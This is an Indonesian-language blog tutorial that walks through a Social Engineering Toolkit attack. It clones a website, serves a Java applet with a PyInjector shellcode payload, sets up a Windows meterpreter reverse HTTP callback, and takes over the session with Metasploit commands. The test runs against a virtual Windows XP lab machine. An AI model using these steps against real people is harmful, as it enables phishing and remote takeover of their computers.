Info BackTrack

Linux & Security Tutorial

PyInjector Shellcode Injection Attack di Social Engineering Toolkit


PyInjector adalah script python yang akan mengambil argumen syntax yang mirip dengan shellcodeexec yang akan memungkinkan anda untuk menyisipkan shellcode asli ke dalam aplikasi browser ,dan secara otomatis akan mengeksekusi shellcode yang telah anda sisipkan.

Untuk lebih jelasnya , bisa dilihat step by step dibawah ini :

—Start Testing Social Engineering Toolkit—

Attacker : SET dari Slackware / BackTrack 5 R1/R2/R3 (yang penting ada SET nya).

Target : Windows Xp SP3 , interface Vboxnet0 (lhost).

—Start

#cd /pentest/exploits/set
#./set

— 1, “Social-Engineering Attacks”

— 2, “Website Attack Vectors”

— 1 “Java Applet Attack Method”

— 2, “Site Cloner”

— Nat /Port (disini saya menggunakan Nat sebagai fundasi tipe interface untuk vboxnet0).

— Ip 192.168.56.1 sebagai web server untuk SET agar bisa mengakses web yang akan di cloning. Dalam uji coba ini, web yang saya cloning adalah http://infobacktrack.com/ .

— 15 “PyInjector Shellcode Injection”

— Dalam pengujain ini , saya menggunakan akses port 8081 (Default dari SET).

— 4 , “Windows meterpreter RI reverse http steger”.

— running & exploit.

— Untuk eksekusinya pada OS target adalah 192.168.56.1 (atau sesuai dengan ip yang sudah anda tentukan sebagai web server untuk SET).

Untuk screen shot gambar diatas saya persingkat saja, dan kita anggap seluruh exploit done / sukses.

— Melihat hasil exploit yang aktif

msf > show sessions

— Mengesekusi exploit yang aktif

sessions -i 2

Jika didalam “show sessions” exploit aktif anda berada di sesion 1 maka untuk masuk ke meterpreter adalah “sessions -i 1”

— Meterpreter / eksekusi berhasil

Dalam Metasploit / Armitage / Websploit / Set , serangan berhasil apabila sudah masuk ke meterpreter alias anda bisa menguasai CMD (jika target windows) atau shell konsole (jika target linux).

—done

Jika anda mengalami kesulitan pada artikel diatas, mohon dikomen atau
PM saya di http://www.facebook.com/lindo.maverick .
Saya siap share dengan anda. =))

Terimakasih telah membaca artikel ini.

Lindo

Greatz : Papa , Mama , dan Mendiang Tunangan Ku (i love u mami).

Artikel Terkait:

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: